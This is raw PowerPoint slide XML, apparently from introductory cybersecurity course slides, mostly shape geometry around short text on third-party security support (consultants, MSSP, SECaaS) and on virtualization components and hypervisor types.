                  <a:lnTo>
                    <a:pt x="54221" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88773" y="1080516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12302870" y="1080516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12337422" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12365640" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12384666" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12391643" y="991743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12391643" y="88773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12384666" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12365640" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12337422" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123028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963673" y="3271266"/>
              <a:ext cx="12392025" cy="1080770"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12392025" h="1080770">
                  <a:moveTo>
                    <a:pt x="0" y="88773"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6977" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88773" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12302870" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12337422" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12365640" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12384666" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12391643" y="88773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12391643" y="991743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12384666" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12365640" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12337422" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12302870" y="1080516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88773" y="1080516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="991743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88773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158745" y="1882292"/>
            <a:ext cx="11875770" cy="21024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177665" marR="5080" indent="-4103370">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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With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limited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technologies,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companies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need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third-party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support.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Third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party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support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can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be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categorized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into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three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tiers:</a:t>
            </a:r>
            <a:endParaRPr sz="2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435"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-55">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Consultants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provides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third-party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expertise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perspective.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940432" y="4549521"/>
            <a:ext cx="6584950" cy="565150"/>
            <a:chOff x="1940432" y="4549521"/>
            <a:chExt cx="6584950" cy="565150"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="object 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1949957" y="4559046"/>
              <a:ext cx="6565900" cy="546100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6565900" h="546100">
                  <a:moveTo>
                    <a:pt x="6474460" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="90931" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55560" y="7153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26654" y="26654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7153" y="55560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="90931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="545591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6565392" y="545591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6565392" y="90931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6558238" y="55560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6538737" y="26654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6509831" y="7153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6474460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949957" y="4559046"/>
              <a:ext cx="6565900" cy="546100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6565900" h="546100">
                  <a:moveTo>
                    <a:pt x="90931" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6474460" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6509831" y="7153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6538737" y="26654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6558238" y="55560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6565392" y="90931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6565392" y="545591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="545591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="90931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7153" y="55560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26654" y="26654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55560" y="7153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90931" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19049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2133345" y="4594098"/>
            <a:ext cx="562991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Managed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Security</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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Services</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Provider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10">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>(MSSP)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928241" y="5017389"/>
            <a:ext cx="12437110" cy="1099820"/>
            <a:chOff x="1928241" y="5017389"/>
            <a:chExt cx="12437110" cy="1099820"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="object 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1937766" y="5026914"/>
              <a:ext cx="12418060" cy="1080770"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12418060" h="1080770">
                  <a:moveTo>
                    <a:pt x="12328778" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="88772" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="991743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88772" y="1080516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12328778" y="1080516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12363330" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12391548" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12410574" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12417551" y="991743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12417551" y="88773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12410574" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12391548" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12363330" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123287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937766" y="5026914"/>
              <a:ext cx="12418060" cy="1080770"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12418060" h="1080770">
                  <a:moveTo>
                    <a:pt x="0" y="88773"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6977" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88772" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12328778" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12363330" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12391548" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12410574" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12417551" y="88773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12417551" y="991743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12410574" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12391548" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12363330" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12328778" y="1080516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88772" y="1080516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="991743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88773"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19049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2133345" y="5371287"/>
            <a:ext cx="490029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provides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turnkey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security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solutions.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919097" y="6305169"/>
            <a:ext cx="12446000" cy="1998980"/>
            <a:chOff x="1919097" y="6305169"/>
            <a:chExt cx="12446000" cy="1998980"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="object 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1939290" y="6314694"/>
              <a:ext cx="6448425" cy="546100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6448425" h="546100">
                  <a:moveTo>
                    <a:pt x="6357112" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="90932" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55560" y="7153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26654" y="26654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7153" y="55560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="90931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="545591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6448044" y="545591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6448044" y="90931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6440890" y="55560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6421389" y="26654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6392483" y="7153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6357112" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="3940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939290" y="6314694"/>
              <a:ext cx="6448425" cy="546100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6448425" h="546100">
                  <a:moveTo>
                    <a:pt x="90932" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6357112" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6392483" y="7153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6421389" y="26654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6440890" y="55560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6448044" y="90931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6448044" y="545591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="545591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="90931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7153" y="55560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26654" y="26654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55560" y="7153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90932" y="0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928622" y="6782562"/>
              <a:ext cx="12426950" cy="1511935"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12426950" h="1511934">
                  <a:moveTo>
                    <a:pt x="12302490" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="124205" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75866" y="9763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36385" y="36385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9763" y="75866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="124206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1387589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9763" y="1435941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36385" y="1475425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75866" y="1502046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124205" y="1511808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12302490" y="1511808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12350829" y="1502046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12390310" y="1475425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12416932" y="1435941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12426695" y="1387589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12426695" y="124206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12416932" y="75866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12390310" y="36385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12350829" y="9763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123024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928622" y="6782562"/>
              <a:ext cx="12426950" cy="1511935"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12426950" h="1511934">
                  <a:moveTo>
                    <a:pt x="0" y="124206"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9763" y="75866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36385" y="36385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75866" y="9763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124205" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12302490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12350829" y="9763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12390310" y="36385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12416932" y="75866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12426695" y="124206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12426695" y="1387589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12416932" y="1435941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12390310" y="1475425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12350829" y="1502046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12302490" y="1511808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124205" y="1511808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75866" y="1502046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36385" y="1475425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9763" y="1435941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1387589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="124206"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="3940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2123694" y="6349695"/>
            <a:ext cx="9735820" cy="16402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0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Security</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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Service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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>(SECaaS)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215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provides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cloud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deployed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security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assessment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analysis.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264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also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provides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cyber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threat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intelligence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machine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learning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analytics.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50055" y="306451"/>
            <a:ext cx="87534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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Virtualization</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="80">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Technologies</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="105">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hypervisor</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="65">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Types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5979" y="760476"/>
            <a:ext cx="12131040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91639" y="1882292"/>
            <a:ext cx="11866245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68120" marR="5080" indent="-1456055">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Virtualization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aids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installing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running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multiple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operating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systems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simultaneously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single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computer.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virtual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platform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usually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needs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three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components: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37604" y="3294888"/>
            <a:ext cx="3418331" cy="438912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048380" y="6277338"/>
            <a:ext cx="3315970" cy="1174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065" marR="5080">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pP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es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oper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tin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stem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60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>,  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Vir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ual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Mach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nes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(VM),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 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instances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98606" y="4438040"/>
            <a:ext cx="3902075" cy="79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75360" marR="5080" indent="-963294">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Hypervisor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4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Virtual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Machine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Monitor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(VMM)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29683" y="3719322"/>
            <a:ext cx="195961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Host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hardware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50055" y="306451"/>
            <a:ext cx="87534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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Virtualization</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="80">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Technologies</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="105">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hypervisor</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="65">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Types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5979" y="760476"/>
            <a:ext cx="12131040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979676" y="2572511"/>
            <a:ext cx="5785485" cy="984885"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5785484" h="984885">
                <a:moveTo>
                  <a:pt x="5621020" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="164084" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="820420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164084" y="984504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5621020" y="984504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5664659" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5703861" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5737066" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5762714" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5779246" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5785104" y="820420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5785104" y="164084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5779246" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5762714" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5737066" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5703861" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5664659" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5621020" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="007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851150" y="2868548"/>
            <a:ext cx="403923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90">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Ty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2200" spc="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hyperv</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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7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(bare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met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75">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>l)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83040" y="2572511"/>
            <a:ext cx="5785485" cy="984885"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5785484" h="984885">
                <a:moveTo>
                  <a:pt x="5621019" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="164083" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164084"/>
                </a:lnTo>
